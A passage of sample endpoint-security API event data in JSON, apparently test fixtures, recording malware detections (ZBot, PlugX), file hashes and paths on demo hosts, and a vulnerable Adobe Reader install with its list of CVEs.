Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408458","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":497000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408457","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":451000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408456","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266495035441000,"timestamp":1610704964,"timestamp_nanoseconds":482000000,"date":"2021-01-15T10:02:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266495035441159","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":544000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":404000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":201000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900074000600,"timestamp":1610704962,"timestamp_nanoseconds":74000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"ZBot:FakeAlert-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704962,"start_date":"2021-01-15T10:02:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"disposition":"Unknown","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900373000000,"timestamp":1610704962,"timestamp_nanoseconds":373000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"ZBot:FakeAlert-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704962,"start_date":"2021-01-15T10:02:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"disposition":"Unknown","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266486445507000,"timestamp":1610704962,"timestamp_nanoseconds":560000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266486445506561","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266486445507000,"timestamp":1610704962,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266486445506562","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3564327093","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395429000700,"timestamp":1610704954,"timestamp_nanoseconds":429000000,"date":"2021-01-15T10:02:34+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610704954,"start_date":"2021-01-15T10:02:34+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0601","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0601"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0602","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0602"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0603","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0603"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0604","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0604"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0605","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0605"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0606","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0606"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0607","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0607"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0608","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0608"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0609","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0609"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0610","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0610"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0611","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0611"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0612","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0612"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0613","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0613"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0614","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0614"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0615","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0615"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0616","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0616"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0617","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0617"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0618","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0618"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0619","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0619"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0620","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0620"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0621","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0621"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0622","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0622"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0623","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0623"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0624","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0624"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0626","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0626"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3346","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3342","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3341","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-1376","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1376"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2718","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2719","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2720","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2721","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2721"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2722","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2722"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2723","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2723"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2724","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2724"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2725","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2725"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2726","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2726"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2727","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2727"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2729","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2729"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2730","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2730"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2731","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2731"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2732","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2733","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2733"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2734","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2734"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2735","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2735"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2736","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3340","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3337","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3338","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3339","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3339"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0641","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0640","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0627","score":7.2,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0627"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906243727720000,"timestamp":1610704934,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:02:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906243727720449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825615424644973000,"timestamp":1610704922,"timestamp_nanoseconds":703000000,"date":"2021-01-15T10:02:02+00:00","event_type":"Policy 